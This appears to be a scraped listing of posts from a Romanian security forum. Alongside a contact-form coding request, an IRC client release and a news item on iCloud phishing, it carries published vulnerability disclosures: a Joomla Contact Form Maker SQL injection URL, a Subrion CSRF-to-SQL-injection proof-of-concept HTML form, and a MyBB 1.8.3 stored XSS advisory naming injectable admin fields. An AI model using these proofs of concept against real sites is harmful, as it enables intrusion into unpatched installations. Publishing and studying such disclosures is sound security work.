Search the Community

Salut, imi poate scrie cineva send.php pentru: <div id="tooplate_main"> <h4>Contact Form</h4> <form method="post" name="contact" action="#"> <label for="author">Name:</label> <input type="text" id="author" name="author" class="required input_field" /> <div class="cleaner h10"></div> <label for="email">Email:</label> <input type="text" class="validate-email required input_field" name="email" id="email" /> <div class="cleaner h10"></div> <label for="subject">Subject:</label> <input type="text" class="validate-subject required input_field" name="subject" id="subject"/> <div class="cleaner h10"></div> <label for="text">Message:</label> <textarea id="text" name="text" rows="0" cols="0" class="required"></textarea> <div class="cleaner h10"></div> <input type="submit" value="Send" id="submit" name="submit" class="submit_btn float_l" /> <input type="reset" value="Reset" id="reset" name="reset" class="submit_btn float_r" /> </form> </div> </div> cu redirect catre 'mesajtrimis.html' Multumesc

[+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability [+]Author: TUNISIAN CYBER [+]Date: 29/03/2015 [+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker [+]Type:WebApp [+]Risk:High [+]Overview: Contact Form Maker v1.0.1 suffers, from an SQL injection vulnerability. [+]Proof Of Concept: 127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL Source

Am facut un client de IRC special pentru canalul #rstforums de pe freenode Trebuie sa va logati cu userul si parola de pe forum (am facut asta pentru a preveni spamul, pentru a sti cine e cine, etc) Trebuie sa aveti instalat .net Framework 4.5 pentru a rula programul. Screenshots: Login form: Main form: Ce stie sa faca: - Logare pe baza forumului - Design frumusel - Sunet la primirea unui mesaj - Iconita din taskbar blinkaie la primirea unui mesaj - Trimiterea mesajului prin apasarea tastei enter in textbox Buguri existente: - Uneori crash la inchiderea programului. - Ferestrele se numesc Form1/Form2, am uitat sa schimb numele. Daca gasiti alte buguri, va rog sa le raportati. Download: IRC Client.exe — RGhost — file sharing Virus scan: https://www.virustotal.com/en/file/aca49cfc58dd5be22e9d2ac25ba08b2e8d66e670fd542a94a27cd7e4b0b0bba6/analysis/1427018283/ Update 1: - va puteti loga cu username-uri care au puncte in ele - notificare cand in user iese/intra/isi schimba nickul

# Affected software: subrion # Type of vulnerability: csrf to sql injection # URL: http://demo.subrion.org # Discovered by: Provensec # Website: http://www.provensec.com #version v3.3.0 # Proof of concept no csrf protection on database form which made subrion to vulnerable to database injection vuln parameter query poc: <html> <body> <form action="http://demo.subrion.org/admin/database/" method="POST"> <input type="hidden" name="query" value="SELECT * FROM `sbr301_albums` `id` " /> <input type="hidden" name="table" value="sbr301_albums" /> <input type="hidden" name="field" value="id" /> <input type="hidden" name="exec_query" value="Go" /> <input type="submit" value="Submit request" /> </form> </body> </html> Source

Advisory: Stored XSS-Vulnerabilities in MyBB v. 1.8.3 Advisory ID: SROEADV-2015-15 Author: Steffen Rösemann Affected Software: MyBB v. 1.8.3 Vendor URL: http://www.mybb.com Vendor Status: patched CVE-ID: - ========================== Vulnerability Description: ========================== MyBB v. 1.8.3 suffers from multiple stored XSS-vulnerabilities in the administrative backend. ================== Technical Details: ================== The stored XSS-vulnerabilities can be found in different modules in the following locations of a common MyBB installation: ====================== Module "config-attachment_types" ====================== via form-field MIME-type: http://{TARGET}/admin/index.php?module=config-attachment_types&action=add executed in: e.g. http:// {TARGET}/admin/index.php?module=config-attachment_types =============== Module "config-mycode" =============== via form fields "title" and "short description": http://{TARGET}/admin/index.php?module=config-mycode&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=config-mycode =================== Module "forum-management" =================== via form field "title": http://{TARGET}/admin/index.php?module=forum-management&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=forum ============== Module "user-groups" ============== via form fields "title" and/or "short description": http://{TARGET}/admin/index.php?module=user-groups&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=user-groups ================ Module "style-templates" ================ via form field "name": http://{TARGET}/admin/index.php?module=style-templates&action=add_set executed in: e.g. http://{TARGET}/admin/index.php?module=style-templates ==================================== Module "style-templates" in action "add_template_group" ==================================== via form field "title": http:// {TARGET}/admin/index.php?module=style-templates&action=add_template_group executed in: e.g. http:// {TARGET}/admin/index.php?module=style-templates&sid={TEMPLATES_NUMERIC_ID} ============= Module "tool-tasks" ============= via form field "title": http://{TARGET}/admin/index.php?module=tools-tasks&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog ================= Module "config-post_icons" ================= via form field "name": http://{TARGET}/admin/index.php?module=config-post_icons&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog ============= Module "user-titles" ============= via form field "title to assign": http://{TARGET}/admin/index.php?module=user-titles&action=add executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog ================ Module "config-banning" ================ via form field "username": http://{TARGET}/admin/index.php?module=config-banning&type=usernames executed in: e.g. http://{TARGET}/admin/index.php?module=tools-adminlog ========= Solution: ========= Upgrade to v. 1.8.4. ==================== Disclosure Timeline: ==================== 02/03-Feb-2015 – found the vulnerabilities 03-Feb-2015 - informed the developers according to their security issue rules (see [3]) 03-Feb-2015 – release date of this security advisory [without technical details] 03-Feb-2015 - vendor replied, issues will be patched 15-Feb-2015 - vendor released patch v. 1.8.4 (see [4]) 19-Feb-2015 - release date of this security advisory 19-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://www.mybb.com [2] http://sroesemann.blogspot.de/2015/02/sroeadv-2015-15.html [3] http://www.mybb.com/get-involved/security/ [4] http://blog.mybb.com/2015/02/15/mybb-1-8-4-released-feature-update-security-maintenance-release/ Source

Hackers are targeting Apple iCloud users with phishing messages designed to steal financial information. Sophos employee Paul Ducklin reported in a blog post that the messages are tailored to look like legitimate security alerts. 'Your account may have been compromised. Please cancel the following Order Number: WZEYMHCQVWZ20,' reads the bogus message. 'Within Apple Inc. latest security checks, we recently discovered that today there were incorrect login attempts to your account. For your account status to get back to normal, Go Here >> to complete the details.' The links in the message go to a page owned by the criminals, which requests the filling in of a 'cancellation form'. "The bogus payment cancellation form is hosted on what looks like a hacked home-user DSL connection in Canada," explained Ducklin. "The data submission form goes to a similar ‘server' hosted on a connection via a boutique ISP in Switzerland." Ducklin recommended a variety of protective measures to defend against phishing attacks of this kind. "Don't assume that crooks aren't interested in you. You may have the smallest, simplest web server in the world, but if there's a security hole, the crooks can use your server, and your URLs, as a staging post for their cyber crimes," he said. "Use two-factor authentication if you can. This relies on one-time log-in codes, so the crooks can't simply phish your password and use it over and over." Ducklin is one of many security professionals to call for wider use of two-factor authentication. Attackers are believed to have taken advantage of a lack of two-factor authentication to guess celebrities' iCloud passwords during a wave of high-profile incidents in 2014. Source

F?r? prea multe explica?ii http://ratati.org/chall/index.php